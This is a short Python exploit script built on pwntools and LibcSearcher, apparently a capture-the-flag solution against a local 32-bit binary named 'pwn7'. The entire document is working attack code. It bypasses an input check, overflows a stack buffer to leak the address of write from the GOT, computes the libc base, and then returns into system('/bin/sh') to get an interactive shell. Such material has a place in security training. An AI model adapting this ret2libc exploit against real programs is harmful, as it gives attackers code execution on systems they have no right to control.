exp
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p = process('./pwn7')
elf = ELF('./pwn7')
payload = '\0'.encode().ljust(0x10, bytes([0xff]))
p.sendline(payload)
p.recvuntil('Correct\n')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x08048825
payload1 = 'a'.encode() * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload1)
write_addr = u32(p.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
p.sendline(payload)
p.recvuntil('Correct\n')
payload2 = 'a'.encode() * (0xe7 + 4) + p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
p.sendline(payload2)
p.interactive()